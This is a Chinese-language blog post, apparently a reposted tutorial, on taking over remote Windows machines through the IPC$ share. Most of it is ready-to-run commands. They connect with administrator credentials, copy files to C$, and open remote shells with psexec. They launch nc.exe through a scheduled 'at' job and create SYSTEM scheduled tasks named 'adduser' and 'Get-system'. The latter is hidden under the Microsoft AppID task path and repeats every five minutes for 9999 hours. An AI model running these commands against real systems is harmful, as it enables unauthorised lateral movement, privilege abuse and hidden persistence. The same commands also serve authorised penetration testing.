IPC$ 命名管道

假装没事ソ 提交于 2019-12-03 08:20:32

介绍:IPC$(Internet Process Connection) 是共享 " 命名管道 " 的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。

四种默认共享:
共享名------资源----------------------注解
C$-----------C:------------------------默认共享
D$-----------D:------------------------默认共享
IPC$------------------------------------远程 IPC
ADMIN$----C:\WINDOWS---------远程管理

1.创建ipc$连接

net use \\192.168.100.3\ipc$ "password" /user:Administrator

2. 上传自己要上传的文件 abc.txt为当前目录下的文件

copy abc.txt \\192.168.1.131\c$

3.验证是否连接成功

net time \192.168.1.131 查看ipc连接的主机的当前时间
psexec.exe /accepteula \192.168.1.108 cmd //前提是需要建立一个空连接或者非空连接
psexec.exe /accepteula \192.168.1.108 cmd -u administrator -p 123456 //不需要建立空连接

4.计划任务执行

at的计划任务:

at \\10.10.10.21 18:51 C:\\nc.exe 2003计划任务运行nc程序

schtasks的计划任务:

schtasks /create /s 10.10.10.19 /u Administrator /p x /ru "SYSTEM" /tn adduser /sc DAILY /st 19:39 /tr c:\\add.bat /F

结果:
SUCCESS: The scheduled task "adduser" has successfully been created.

5.删除会话

net use \\192.168.1.131\ipc$ del


schtasks使用举例:

schtasks /create /ru SYSTEM /sc DAILY /mo 1 /st 00:00:00 /RI 5 /DU 9999:00 /TN \Microsoft\Windows\APPID\Get-system /tr E:\1.bat /F

则为->/ru 指定任务的运行用户为system->/sc 1-365天->/st 任务的开始时间为00.00.00->/RI 重复间隔为5分钟->/DU 任务持续时间为9999个小时->/TN 给这个任务指定名称为Get-system->/tr 运行参数为 E:\1.BAT->/F 强制创建任务

schtasks /create /RU SYSTEM /SC DAILY /mo 1 /ST 00:00:00 /RI 5 /DU 9999:00 /TN \Microsoft\Windows\AppID\Get-system /TR "cmd /c whoami>>d:\1.txt" /F

则为->/ru 指定任务的运行用户为system->/sc 1-365天->/st 任务的开始时间为00.00.00->/RI 重复间隔为5分钟->/DU 任务持续时间为9999个小时->/TN 给这个任务指定名称为Get-system->/tr 运行参数为cmd /c whoami>>d:\1.txt(记得加双引号)->/F 强制创建任务

ipc连接失败的原因:

1)你的系统不是NT或以上操作系统;
2)对方没有打开ipc$默认共享
3)对方未开启139或445端口(惑被防火墙屏蔽)
4)你的命令输入有误(比如缺少了空格等)
5)用户名或密码错误(空连接当然无所谓了)
另外,你也可以根据返回的错误号分析原因:
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码 : 原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)
错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。
标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!